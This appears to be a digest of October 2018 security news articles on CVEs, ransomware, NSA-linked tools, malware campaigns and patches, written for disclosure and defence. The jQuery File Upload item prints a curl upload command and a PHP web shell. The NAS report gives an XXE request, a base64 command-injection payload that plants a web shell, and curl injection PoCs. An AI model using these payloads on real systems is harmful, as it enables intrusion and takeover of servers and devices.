The researcher Ori Karliner and his team analyzed some of the most popular operating systems in the IoT market, including the FreeRTOS. FreeRTOS is an open-source operating system that runs on most of the small microprocessors and microcontrollers in IoT devices.

Karliner discovered 13 vulnerabilities in FreeRTOS that could be exploited by an attacker to conduct several malicious activities, including remote code execution, information leak and DoS attacks.

FreeRTOS IoT botnet

The OS supports more than 40 hardware architectures, it is used in a broad range of products, including appliances, sensors, electricity meters, fitness trackers, industrial automation systems, cars, electricity meters, and any microcontroller-based devices.

The vulnerabilities reside in the implementation of the TCP/IP stack and affect a FreeRTOS branch maintained by Amazon and the OpenRTOS and SafeRTOS maintained by WITTENSTEIN high integrity systems (WHIS).

The flaws affect the FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), AWS FreeRTOS up to V1.3.1, OpenRTOS and SafeRTOS (With WHIS Connect middleware TCP/IP components).

Amazon has been notified of the situation and the company responded by releasing patches to mitigate the problems.

“During our research, we discovered multiple vulnerabilities within FreeRTOS’s TCP/IP stack and in the AWS secure connectivity modules. The same vulnerabilities are present in WHIS Connect TCP/IP component for OpenRTOS\SafeRTOS.” reads the analysis published by Zimperium.

“These vulnerabilities allow an attacker to crash the device, leak information from the device’s memory, and remotely execute code on it, thus completely compromising it.”

Zimperium will wait for 30 days before releasing technical details about its findings, to allow smaller vendors to patch the vulnerabilities.

Below the full list of the vulnerabilities discovered by the experts.

CVE-2018-16522 Remote Code Execution
CVE-2018-16525 Remote Code Execution
CVE-2018-16526 Remote Code Eexecution
CVE-2018-16528 Remote Code Execution
CVE-2018-16523 Denial of Service
CVE-2018-16524 Information Leak
CVE-2018-16527 Information Leak
CVE-2018-16599 Information Leak
CVE-2018-16600 Information Leak
CVE-2018-16601 Information Leak
CVE-2018-16602 Information Leak
CVE-2018-16603 Information Leak
CVE-2018-16598 Other

City Pays $2,000 in Computer Ransomware Attack
22.10.2018 securityweek

A Connecticut city has paid $2,000 to restore access to its computer system after a ransomware attack.

West Haven officials said Thursday they paid the money to anonymous attackers through the digital currency bitcoin to unlock 23 servers and restore access to city data.

The attack disabled servers early Tuesday morning, and city officials say it was contained by 5:30 p.m. Wednesday.

City attorney Lee Tiernan says officials initially didn't want to pay the ransom, but research showed it was the best course of action.

The city says there's no reason to believe data was compromised. Employee pay was not affected.

The U.S. Department of Homeland Security says the attack came from outside the U.S.

An investigation is ongoing.

0-Day in jQuery Plugin Impacts Thousands of Applications
22.10.2018 securityweek

Thousands of projects are possibly impacted by a jQuery File Upload plugin vulnerability that has been actively exploited in the wild, a security researcher has discovered.

Tracked as CVE-2018-9206, the security bug impacts older versions of the plugin as well, going all the way back to 2010, Akamai researcher Larry Cashdollar found out. At the moment, there are over 7,800 forks of the plugin, and their vast majority carry the original vulnerability.

jQuery File Upload is a jQuery widget “with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video.” The plugin works with a broad range of server-side platforms that support standard HTML form file uploads: PHP, Python, Ruby on Rails, Java, Node.js, Go, and others.

While analyzing the package’s source, Cashdollar discovered two PHP files named upload.php and UploadHandler.php, which contained the file upload code. Files were saved to the files/ directory in the web server's root path, and the researcher was able to leverage this to upload a web shell and run commands on the server.

“A browser connection to the test web server with cmd=id returned the user id of the web server's running process,” the researcher notes.

Any project that uses the plugin’s code — and possibly code derived from it — is vulnerable and there are even YouTube videos available on how the bug can be exploited in similar software packages.

“This package has been included in various other packages and this code included in the projects web accessible path. It's actively being exploited in the wild,” the researcher told the plugin author.

Apparently, the issue was caused by Apache disabling support for .htaccess in version 2.3.9. While the move was meant to improve performance and to prevent users from overriding security features that were configured on the server, it also left some developers and their projects open to attacks.

The jQuery File Upload PHP implementation, which relied on the .htaccess file for security, was affected too. The bug was addressed in the plugin by only allowing file uploads to be of a content-type image.

However, all projects relying on the jQuery File Upload code would be vulnerable, even if the fork authors changed the original code to suit their own project. These range from stand-alone web applications to WordPress plugins and other content management systems.

“I've done some testing against the 1000 forks of the original code and it seems only 36 were not vulnerable. I found these only required a slight tweak to my exploit to get the majority of them working,” Cashdollar, who also published proof-of-concept (PoC) code, explains.

The flaw would open any project used in production to data exfiltration, malware infection, defacement, and other types of attacks. One other issue would be that it’s virtually impossible to determine how many of the projects forked from the vulnerable plugin are being properly maintained or how many are being used in production environments.

NSA-Linked 'DarkPulsar' Exploit Tool Detailed
22.10.2018 securityweek

Kaspersky Lab security researchers have analyzed another exploit tool that was supposedly stolen from the National Security Agency-linked Equation Group.

Dubbed DarkPulsar, the tool is an administrative plugin, part of the NSA-linked exploits that the Shadow Brokers group made public in March 2017, specifically the DanderSpritz and FuzzBunch frameworks.

Part of FuzzBunch’s ImplantConfig category, which includes plugins for the post-exploitation stage, DarkPulsar was designed for controlling a passive backdoor named ‘sipauth32.tsp’, which provides remote control of compromised machines.

The DarkPulsar module includes support for a variety of commands, including Burn, RawShellcode, UpgradeImplant, and PingPong, which are meant to remove the implant, run arbitrary code, upgrade the implant, and check if the backdoor is installed on a remote machine, respectively. Other supported commands are EDFStagedUpload, DisableSecurity, and EnableSecurity.

Kaspersky Lab has determined that the DarkPulsar backdoor, which targets both 32-bit and 64-bit systems, was used on 50 victims located in Russia, Iran and Egypt, and that it typically infected machines running Windows Server 2003/2008. The victims are in the nuclear energy, telecommunications, IT, aerospace and R&D sectors.

The security researchers believe that the victims were the targets of a long-term espionage campaign. The backdoor not only includes an advanced mechanism of persistence, but also functionality to bypass the need to enter a valid username and password during authentication. It also encapsulates its traffic into legitimate protocols.

The infection campaign is believed to have stopped after the exploits were made public, but the backdoor likely remained on some of the compromised machines. The malware, however, can only be used by the real DarkPulsar managers, as it requires the private RSA key which pairs to the public key embedded in the backdoor.

“We found around 50 victims, but believe that the figure was much higher when the Fuzzbunch and DanderSpritz frameworks were actively used. We think so because of the DanderSpritz interface, which allows many victims to be managed at the same time,” Kaspersky Lab says.

The DarkPulsar administrative interface functions under the principle of “one command – one launch” and is a plugin of the FuzzBunch framework, which was designed to manage parameters and coordinate different components.

The researchers note that the framework for controlling infected machines is, in fact, DanderSpritz, which uses a plugin called PeedleCheap to configure implants and connect to infected machines to enable post-exploitation features.

Through DarkPulsar, a strong connection between DanderSpritz and FuzzBunch emerges. The backdoor is used to deploy the more functional PeddleCheap implant onto the victim machines, via PCDllLauncher, which apparently stands for ‘PeddleCheap DLL Launcher’.

Thus, the researchers concluded that FuzzBunch and DanderSpritz are designed not only to be flexible, but also to extend functionality and compatibility with other tools.

“Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims,” Kaspersky concludes.

DarkPulsar and other NSA hacking tools used in hacking operations in the wild
22.10.2018 securityaffairs

Attackers are targeting high-value servers using a three of hacking tools from NSA arsenal, including DarkPulsar, that were leaked by the Shadow Brokers hacker group.
The hackers used the powerful cyber weapons to compromise systems used in aerospace, nuclear energy, R&D, and other industries.

According to experts from Kaspersky Lab, threat actors leverage NSA tools DarkPulsar, DanderSpritz and Fuzzbunch to infect Windows Server 2003 and 2008 systems in 50 organizations in Russia, Iran, and Egypt.

The infected vulnerable servers are used in some 50 organizations within industries including aerospace and nuclear energy, particularly those with large IT and R&D departments.

“DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims.” Kaspersky Lab experts Andrey Dolgushev, Dmitry Tarakanov, and Vasily Berdnikov wrote.

“Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc.”

DarkPulsar is a backdoor that could be used by attackers in conjunction with the Fuzzbunch exploit kit to gain remote access to the targeted server.

Once the backdoor is established the attackers could use the plugins of DanderSpritz to monitor and exfiltrate data from the compromised machines.

DarkPulsar ShadowBrokers

Each hacking tool supports a set of plugins designed for different tasks, the FuzzBunch plugins are used for reconnaissance and hacking the target system, DanderSpritz plugins are used for the management of already infected victims.

The discovery of the last wave of attacks is very important, it demonstrates that threat actors could chain nation-state hacking tools and exploit to create a powerful attack package. It shows how hackers combined the tool to carry out high sophisticated hacking operations.

“The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attacking platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealthiness,” Kaspersky Lab said.

“The implementation of these capabilities, such as encapsulating its traffic into legitimate protocols and bypassing entering credentials to pass authentication, are highly professional.”

The expert from Kaspersky also provided technical details and IoCs for the attacks leveraging the NSA tools.

It is important to remind that security patches are available for the vulnerabilities targeted by the leaked NSA exploits.

“The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools,” concludes the experts.

“Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.”

Drupal dev team fixed Remote Code Execution flaws in the popular CMS
22.10.2018 securityaffairs

The Drupal development team has patched several vulnerabilities in version 7 and 8 of the popular CMS, including RCE flaws.
The development team of the Drupal content management system addressed several vulnerabilities in version 7 and 8, including some flaws that could be exploited for remote code execution.

Drupal team fixed a critical vulnerability that resides in the Contextual Links module, that fails to properly validate requested contextual links. The flaw could be exploited by an attacker with an account with the “access contextual links” permission for a remote code execution,

“The Contextual Links module doesn’t sufficiently validate the requested contextual links.” reads the security advisory.
“This vulnerability is mitigated by the fact that an attacker must have a role with the permission “access contextual links”.”

Another critical vulnerability fixed by the development team is an injection issue that resides in the DefaultMailSystem::mail() function. The root cause of the bug is the lack of sanitization of some variables for shell arguments when sending emails.

“When sending email some variables were not being sanitized for shell arguments, which could lead to remote code execution.” continues the advisory.

The remaining vulnerabilities addressed in the CMS have been assigned a “moderately critical” rating, they include a couple of open redirect bugs and an access bypass issue related to content moderation.

The vulnerabilities have been addressed with the release of Drupal 7.60, 8.6.2 and 8.5.8.

Drupal team urges users to install security updates as soon as possible, there is the concrete risk that threat actors in the wild will start to exploit flaw in massive hacking campaigns.

Thousands of applications affected by a zero-day issue in jQuery File Upload plugin
22.10.2018 securityaffairs

A security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, that affects older versions of the jQuery File Upload plugin since 2010.
Attackers can exploit the vulnerability to carry out several malicious activities, including defacement, exfiltration, and malware infection.

The flaw was reported by the Akamai researcher Larry Cashdollar, he explained that many other packages that include the vulnerable code may be affected.

“This package has been included in various other packages and this code included in the projects web accessible path. It’s actively being exploited in the wild,” the researcher told the plugin author.

The jQuery File Upload is a jQuery widget “with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video.”

The plugin is widely adopted by numerous server-side platforms that support standard HTML form file uploads: PHP, Python, Ruby on Rails, Java, Node.js, Go, and others.

Cashdollar discovered two PHP files named upload.php and UploadHandler.php in the package’s source, which contained the file upload code.

The files were uploaded to the files/ directory in the root path of the webserver, so the expert wrote a command line test with curl and a simple PHP shell to confirm that it was possible to upload a web shell and run commands on the server.

$ curl -F “files=@shell.php” http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET[‘cmd’]; system($cmd);?>

“A browser connection to the test web server with cmd=id returned the user id of the web server’s running process. I suspected this vulnerability hadn’t gone unnoticed and a quick Google search confirmed that other projects that used this code or possibly code derived from it were vulnerable. There are a few Youtube videos demonstrating the attack for similar software packages.” wrote the expert.

Evert project that leverages the plugin is potentially affected, the researcher pointed out that there are a few Youtube PoC videos demonstrating the exploitation of the attack for similar software packages.

Cashdollar also published a proof-of-concept (PoC) code.

The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a director) and to prevent users from overriding security features that were configured on the server.

The side effect is that the technical choice left some developers and their projects open to attacks.

In order to address these changes and correct the file upload vulnerability in CVE-2018-9206 in Blueimp, the developer only allows file uploads to be of a content-type image.

“The internet relies on many security controls every day in order to keep our systems, data, and transactions safe and secure. If one of these controls suddenly doesn’t exist it may put security at risk unknowingly to the users and software developers relying on them.” concludes the expert.

“For software developers reviewing changes to the systems and libraries you rely on during the development of your project is a great idea as well. In the article above a security control was removed by Apache it not only removed a security control for Blueimp’s Jquery file upload software project but most of all of the forked code branches off of it. The vulnerability impacted many projects that depend on it from stand-alone web applications to WordPress plugins and other CMSs.”

Syrian victims of the GandCrab ransomware can decrypt their files for free
22.10.2018 securityaffairs

The developers of the GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.
The authors of the infamous GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

gandcrab ransomware post underground
Gandcrab developers’ post – Source Bleeping Computer

The crooks decided to release the decryption keys after a Syrian Twitter user published a harrowing message asking for help after photos of his deceased children were encrypted by the ransomware.

جميل سليمان
· Oct 16, 2018
@coveware Hello, my name is Jameel, I am a Syrian father who lost both his sons to the cruel war the country is going through
All I have left of my children is the photos and videos I took of them before they were mercilessly killed. And now GandCrab V5.0.3 has locked all of them

جميل سليمان
They want 600 dollars to give me back my children, that's what they've done, they've taken my boys away from me for a some filthy money. How can I pay them 600 dollars if I barely have enough money to put food on the table for me and my wife?

7:55 AM - Oct 16, 2018
See جميل سليمان's other Tweets
Twitter Ads info and privacy
The GandCrab developers explained that it was not their intention to infect Syrian users, their message on the hacking forum includes a link to a zip file containing the decryption keys for Syrian victims.

“This zip file contains the readme.txt in Russian language and SY_keys.txt files. The readme.txt file contains information on how the key file is organized and information on why the keys were released.” states Bleeping Computer.

“The most important thing is not to indicate that he will help everyone. It will help only a citizen of Syria. Because of their political situation, economic and relations with the CIS countries. We regret that we did not initially add this country to the exceptions. But at least that way we can help them now.” reads the message from the author of the ransomware.

The SY_keys.txt file includes a list of 978 decryption keys for Syrian victims whose systems have been infected with GandCrab version 1.0 through 5.0.

Syrian victims that are not included in the file could receive the decryption keys by providing the GandCrab developers a picture of themselves, their passport, and their payment page. Providing crooks pictures of their passport is very risky, this kind of documents could be resold by the crooks or used by them for identity thefts.

Experts believe that security firms will develop a decryption tool based on the released encryption keys.

WizCase Report: Vulnerabilities found in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS
22.10.2018 securityaffairs

Security researchers from WizCase have discovered several vulnerabilities in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS.
NAS devices have become the storage device of choice for many small and medium businesses (SMB). They are inexpensive, easy to operate, and you can add additional storage if you’re running low on space. But is it secure enough to protect your companies data? That was the question in our mind when we brought security researchers Paulos Yibelo and Daniel Eshetu to see if they could exploit any vulnerabilities in the leading NAS devices.

We focused on discovering only critical vulnerabilities that can be exploited remotely without any user interaction. Meaning, authentication bypasses weren’t enough. We wanted to execute commands on the devices remotely with the highest privileges. We were successful, in all the devices.

Summary of Our Findings
We used four popular NAS devices for this project

WD My Book,
NetGear Stora
SeaGate Home
Medion LifeCloud NAS
We successfully gained root remote command execution in the devices, and therefore the network they are on, simply by knowing their IP addresses.

All four NAS devices tested suffer from a zero-day unauthenticated root remote command execution (preauth RCE) vulnerabilities.
The vulnerabilities allow hackers, governments, or anyone with malicious intention to read files, add/remove users, add/modify existing data, or execute commands with highest privileges on all of the devices.
It is our belief that there are many other NAS devices that suffer from similar vulnerabilities as there seems to be a missing pattern of expected from NAS devices.
Both the vulnerabilities (dubbed CVE-2018-18472 and CVE-2018-18471) remain unpatched at the time of this publication.
There are nearly 2 million affected devices online
CVE-2018-18472 – XXE and Unauthenticated Remote Command Execution in Axentra Hipserv NAS firmware.
Axentra Hipserv is a NAS OS that runs on multiple devices and provides cloud-based login and file storage and management functionalities for different devices. It’s used in different devices from different vendors, the affected devices sharing the firmware are:

Netgear Stora
Seagate GoFlex Home
Medion LifeCloud (maybe more).
The company provides a firmware with a web interface that mainly uses PHP as a serverside language. The web interface has a REST API endpoint and a typical web management interface with a file manager support.

Firmware Analysis.

After extracting the firmware and decoding the files, the php files were located in /var/www/html/ with the webroot in /var/www/html/html. The main handler for the web interface is homebase.php and RESTAPIController.php is the main handler for the rest API. All the php files were encrypted using IONCube which has a known public decoder and given the version used was an old one, decoding the files didn’t take long.

Part One: XXE

After decoding the files, most of the API endpoints and the web interface were not accessible without authentication. One of the few exceptions to this were a few endpoints in the REST API interface. One of those endpoints is located at /api/2.0/rest/aggregator/xml which loads xml data from POST data, although it uses DOMDocument for loading (parsing) the xml which should not be vulnerable to XXE attacks.

The version of libxml2 used as a backend in the firmware is an old one. This means that the external entity loading was not disabled by default. which opened the endpoint to exploitation. Through this it was possible to read files and perform SSRF attacks. An example request is given below

POST /api/2.0/rest/aggregator/xml HTTP/1.1
User-Agent: GoogleBot/2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Cookie: HOMEBASEID=c4be432f8add72db591aaa72c0fbbd34
Connection: close
Upgrade-Insecure-Requests: 1

<?xml version=”1.0″?>
<!DOCTYPE requests [
<!ELEMENT request (#PCDATA)>
<!ENTITY % dtd SYSTEM “”>
<request href=”/api/2.0/rest/3rdparty/facebook/” method=”GET”></request>

The above request caused the xml parser to make a request to our server at for the file XXE_CHECK. Although LFI was interesting to grab some sensitive files since XML can’t handle binary data it was not possible to dump the SQLite database to get usernames and passwords.

That meant we are able to read files and make SSRF requests in any of the below devices.

Netgear Stora
Seagate GoFlex Home
Medion LifeCloud
Part Two: RCE

Looking at how the web interface (REST API in particular) performed root actions was the next step. Since the web server runs as a non-root user and it had no sudo rights then it was found that the REST API makes calls to a local daemon named oe-spd, which runs on port 2000 bound to

The daemon takes XML data, parses the request and carries out the action without any authentication, except making sure the request came from What’s more, the daemon skips over junk data until it finds the string <?xml version=”1.0″?> as shown in the IDA snippet below.

strstr(*input_data, “<?xml version=\”1.0\”?>”);

This made things a lot easier since the request is going to be sent using the HTTP protocol, skipping over junk data (according to the daemon) was a real help. But, since we can’t directly put the URL in the xml file we make the xml parser send a request to a php script (or anything that does the redirection really) that redirects it to*payload here*.

Since the daemon is choke full of command execution bugs, it was easy to craft a request that triggered one. Additionally, since the daemon runs with root privileges it’s possible to perform any action on the device. An example payload is given below.

* This payload uploads a simple php shell /var/www/html/html/u.php (<device-ip>/u.php?cmd=id).

<?xml version=”1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=”disk”>a`echo PD9waHAKZWNobyAnPHByZT4nOwpzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKZWNobyAnPC9wcmU+JzsKPz4K | base64 -d >/var/www/html/html/u.php`</parameter></proxy_request>

Putting it all together.
To chain the vulnerabilities seamlessly we need a server the device can make an outbound connection to and the following simple PHP script to redirect the parser to send the payload and handle a little multi-staging of payloads.

CVE-2018-18472 –WD MyBook Live Unauthenticated Remote Command Execution
WD MyBook Live and some models of WD MyCloud NAS contain a remotely exploitable vulnerability that lets anyone run commands on the device as root. The vulnerability exists in the language change and modifies functionality in the REST API, the following PoC demonstrates this flaw.


curl –kX PUT -d ‘language=en_US`<linx Command Here>`’ https://<NAS_IP>/api/1.0/rest/language_configuration


curl –kX PUT -d ‘language=en_US`id > /var/www/id.txt`’ https://<NAS_IP>/api/1.0/rest/language_configuration

The poc will create a id.txt file in the webroot containing the output of the ID command. The file can be removed using the following PoC

curl -kX PUT -d ‘language=en_US`rm -rf /var/www/id.txt`’ https://<NAS_IP>/api/1.0/rest/language_configuration

What does this mean to the affected NAS users?
If you are using one of the above devices and they are connected on the WAN, make sure to remove your device from the internet. (Make sure they are running only locally in safe network)
Make sure to contact the affected vendors and insist they release a patch as soon possible!
We will update this article as a patch becomes available.
We also recommend you use a VPN to protect your computers and mobile devices from hackers. ExpressVPN and NordVPN both use AES 256-bit encryption and will secure all your data. (This won’t protect from an NAS attack, but it will protect you from other cyber attacks)

Hackers breached into system that interacts with HealthCare.gov
22.10.2018 securityaffairs

Centers for Medicare and Medicaid Services announced hackers breached into a computer system that interacts with HealthCare.gov.
Hackers breached into a computer system that interacts with HealthCare.gov, according to Centers for Medicare and Medicaid Services, attackers accessed to the sensitive personal data of some 75,000 people.

After experts discovered the intrusion, the system was shut down and the IT staff is working to restore the operation.

“Officials said the hacked system was shut down and technicians are working to restore it before sign-up season starts Nov. 1 for health care coverage under the Affordable Care Act.” reported the Associated Press.

“The system that was hacked is used by insurance agents and brokers to directly enroll customers. All other sign-up systems are working.”

In the US, Barack Obama’s health care law ensured the private coverage for about 10 million people that in order to access the public service have to provide extensive personal information, including Social Security numbers, income, and citizenship or legal immigration status.

Starting November 1, people can log in to HealthCare.gov, fill out an application, and enroll in a 2019 Marketplace health plan.

A spokesman for the Centers for Medicare and Medicaid declared that “nothing happened” to the HealthCare.gov website that is used by the general public.

“This concerns the agent and broker portal, which is not accessible to the general public,” he said.

Law enforcement is investigating the incident and notified affected customers that will receive free credit protection.

Chinese Hackers Use 'Datper' Trojan in Recent Campaign
21.10.2018 securityweek
CyberSpy  Virus

A China-linked cyber espionage group known as Tick was observed using the Datper malware in a recent campaign, Cisco Talos security researchers reveal.

Also referred to as Redbaldknight and Bronze Butler, Tick has been launching various cyber-attacks against entities in South Korea and Japan over the past couple of years. The campaign Talos analyzed also used compromised websites located in the two countries as command and control (C&C) servers.

Although Tick has been using custom tools in each campaign, the researchers observed a series of recurring patterns in the use of infrastructure, such as overlaps in hijacked C&C domains or the use of the same IP.

Based on these infrastructure patterns, the experts discovered similarities between the Datper, xxmm backdoor, and Emdivi malware families that the threat actor has used in attacks.

Datper, the malware used in the campaign Talos analyzed, can execute shell commands on the victim machine, while also obtaining hostnames and drive information. The used infection vector, however, is unknown, Talos says.

The analyzed Datper variant used the compromised website of a legitimate Korean laundry service to host their C&C. Located at whitepia[.]co.kr, the site does not use SSL encryption or certificates, which rendered it vulnerable to attacks.

The security researchers observed other compromised websites as well being used as C&C servers as part of the attack. This led to the hypothesis that the malware could be delivered via web-based assaults, such as drive-by downloads or watering hole attacks.

Talos also discovered hosts that were being used as C&C servers although they were not connected to compromised websites. This would suggest that the hackers initially deployed the C&C infrastructure on legitimately obtained (and potentially purchased) hosts.

“The actor behind this campaign deployed and managed their C&X infrastructure mainly in South Korea and Japan. We confirmed that the actor periodically changed their C&C infrastructure and appears to have a history of identifying and penetrating vulnerable websites located in these countries,” Talos says.

Once on the infected machine, Datper would create a mutex object and retrieve several pieces of information from the victim machine, including system information and keyboard layout. Next, the malware attempts to issue an HTTP GET request to the C&C server (which was unavailable during investigation).

Some of the compromised websites were also used as C&C domains for the xxmm backdoor, also known as Murim or Wrim, which was previously associated with the threat actor, and which allows attackers to install additional malicious tools onto the infected machines. The two samples also use similar GET request URI paths.

A Datper variant compiled in March 2018 was observed using a legitimate website as C&C, resolving to the same IP used for the C&C infrastructure of the Emdivi malware family. This Trojan opens a backdoor on the compromised machines and was previously attributed to the threat actor behind the campaign "Blue termite."

“Talos’ investigation into attacks conducted by this actor indicates commonalities between the Datper, xxmm backdoor, and Emdivi malware families. Specifically, these similarities are in the C&C infrastructure of attacks utilizing these malware families. Some C&C domains used in these attacks resolve to hijacked, legitimate South Korean and Japanese hosts and may have been purchased by the attacker,” Talos concludes.

Flaws Open Telepresence Robots to Prying Eyes
21.10.2018 securityweek

Vulnerabilities in telepresence robots could provide an attacker not only with command execution capabilities, but also with access to a live video stream from the device, Zingbox reports.

The healthcare IoT analytics platform provider has analyzed the VGo telepresence robot from Vecna. Nicknamed “Celia,” it has an XMPP chat client that supports voice and video communication over the VGoNet Cloud Network.

When a call is connected, the caller, whose face is displayed on the device’s screen, can control the robot using the client interface. In addition to voice calls and video streaming, the robot can speak text messages, move around at different speeds, take pictures, and recognize speech.VGo telepresence robots are affected by vulnerabilities

During its assessment of the device, Zingbox discovered five vulnerabilities that it reported to the manufacturer via ICS-CERT. These include issues usually found in IoT devices, such as insufficiently protected credentials and the transmission of sensitive information in cleartext.

One of the most important issues discovered in the device was the fact that firmware updates were being delivered over HTTP. Tracked as CVE-2018-8860, the vulnerability could allow an attacker sniffing the network to intercept the update.

VGo telepresence robots are affected by vulnerabilities

Next, the attacker could use various tools to peek inside the intercepted firmware and find weaknesses they could target to compromise the robot. The Zingbox security researchers did find such an issue in the form of a CGI script that was not supposed to be included on production, being a development tool.

“It could run limited commands on the robot, probably for diagnostics, such as those to view running processes, view logs, reboot the robot, and see network connections,” the researchers explain in a report (PDF).

Tracked as CVE-2018-8866, the next vulnerability consists of most of the GET parameters of the CGI being vulnerable to command injection, due to the lack of input validation. This provided the researchers with arbitrary command execution capabilities.

Because the CGI script runs with root privileges, the researchers could also gain unauthorized root access to the robot. Leveraging such privileges, an attacker could then abuse the robot to target other systems located in the same network segment.

Code execution could also be achieved with physical access to the USB slot located in the back of the robot. An attacker with a USB stick containing a file with the name startup.script inside a config folder in the root partition could gain code execution by simply plugging in the device into the port and rebooting the robot.

Once inside the robot, the researchers also discovered that Wi-Fi and robot XMPP credentials were stored in plain text (CVE-2018-8858). Armed with the Wi-Fi credentials, an attacker could then start attacking other assets on the network.

The security researchers also discovered chat information in log files, thus being able to read and steal text messages sent between the conversation partners. With the pictures taken by the robot being temporarily stored locally in the robot’s file system, an attacker who already has access to the robot can also retrieve those when they are created.

Moreover, an attacker “can capture live video streaming remotely and start watching the victims live,” the researchers warn.

The vendor has released an update that patches the vulnerabilities. Automatic updates are enabled by default.

Splunk Patches Several Flaws in Enterprise, Light Products
21.10.2018 securityweek 

Splunk recently patched several vulnerabilities in its Enterprise and Light products, including flaws that have been rated “high severity.”

Splunk Enterprise allows organizations to search, analyze and visualize data collected from websites, apps, sensors and other devices. Splunk Light is a solution that automates log searching and analysis, along with server and network monitoring, in small IT networks.

The most serious of the vulnerabilities affecting these products – with a CVSS score of 8.1 (high severity) – is CVE-2018-7427, a cross-site scripting (XSS) issue in the Splunk Web interface.

Another serious flaw allows an attacker to cause a denial-of-service (DoS) condition by sending a specially crafted HTTP request to Splunkd, the system process that handles indexing, searching and forwarding. This bug is tracked as CVE-2018-7429.

CVE-2018-7432 is a similar DoS flaw that can be exploited using malicious HTTP requests sent to Splunkd, but the vendor has only assigned it a “medium severity” rating.

The last vulnerability, tracked as CVE-2018-7431 and also rated “medium severity,” has been described as a path traversal issue that allows an authenticated attacker to download arbitrary files from the Splunk Django app.

Two of the vulnerabilities affect Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14, and Splunk Light before 6.6.0. CVE-2018-7432 affects the same versions, except for 6.1.x and 6.0.x. CVE-2018-7429 impacts Enterprise 6.4.x before 6.4.8, 6.3.x before 6.3.11, 6.2.x before 6.2.14, and Light before 6.5.0.

Splunk says it has found no evidence to suggest that these vulnerabilities have been exploited for malicious purposes.

“To mitigate these issues, Splunk recommends upgrading to the latest release and applying as many of the Hardening Standards from the Securing Splunk documentation as are relevant to your environment. Splunk Enterprise and Splunk Light releases are cumulative, meaning that future releases will contain fixes to these vulnerabilities, new features and other bug fixes,” Splunk said in an advisory.

Remote Code Execution Flaws Patched in Drupal
21.10.2018 securityweek
Developers of the Drupal content management system (CMS) have patched several vulnerabilities in the 7 and 8 branches, including serious flaws that can be exploited for remote code execution.

One of the security holes, rated “critical,” affects the Contextual Links module, which fails to properly validate requested contextual links. The vulnerability can allow remote code execution, but the attacker requires an account with the “access contextual links” permission for exploitation.

Another “critical” flaw is an injection issue in the DefaultMailSystem::mail() function. The problem is caused by the lack of sanitization of some variables for shell arguments when sending emails.

It’s worth noting that in Drupal’s case “critical” is the second highest security risk level, after “highly critical.” “Moderately critical” follows “critical” on the criticality scale.

The other three vulnerabilities addressed in the CMS this week have been assigned a “moderately critical” rating. This includes an access bypass issue related to content moderation, and two open redirect bugs.

One of the open redirect issues was publicly documented before the patches were released. Drupal developers also warned that the changes implemented in order to fix the access bypass weakness can have implications for backwards compatibility.

The vulnerabilities have been patched with the release of Drupal 7.60, 8.6.2 and 8.5.8.

It’s important that users install security updates as soon as possible. Drupal vulnerabilities have often been exploited by malicious hackers in the past years.

The recently disclosed flaws dubbed Drupalgeddon2 and Drupalgeddon3 have been exploited to deliver cryprocurrency miners, RATs, tech support scams and other threats. In recent attacks, threat actors exploited Drupalgeddon2 to install a backdoor on compromised servers.

Mozilla Brings Encrypted SNI to Firefox Nightly
21.10.2018 securityweek

Mozilla says Firefox Nightly now supports encrypting the Transport Layer Security (TLS) Server Name Indication (SNI) extension, several weeks after Cloudflare announced it turned on Encrypted SNI (ESNI) across all of its network.

Introduced in 2003 to address the issue of accessing encrypted websites hosted at the same IP, the SNI extension was found to leak the identity of the sites that the user visits, which creates privacy issues. The problem is that, during the initial TLS handshake, the ClientHello message is sent unencrypted.

ESNI, an extension to TLS version 1.3 and above, attempts to mitigate that by replacing the SNI extension in ClientHello with an encrypted variant.

Now, Firefox Nightly users can take advantage of this added protection by enabling the encryption of SNI in the browser. ESNI will automatically work with any site that supports it, which currently only means sites hosted by Cloudflare.

Over 80% of the web traffic today is encrypted with HTTPS, meaning that the content of the messages exchanged between a server and a user’s browser are kept private, but attackers can still learn which sites the user is accessing.

As Mozilla’s Eric Rescorla explains, browsing history information leaks to the network in four ways, namely through the TLS certificate message, DNS name resolution, the server IP address, and the SNI extension.

TLS 1.3 now encrypts the server certificate by default and DNS traffic can be protected by using DNS over HTTPS. The IP address remains an issue, somewhat mitigated by the fact that multiple sites often use the same address (which is the reason SNI was needed in the first place).

ESNI, Rescorla says, posed challenges because initial designs affected performance, and TLS 1.3 was eventually published without it. As it turns out, the issue can be mounted via mass-conversion to encrypted SNI.

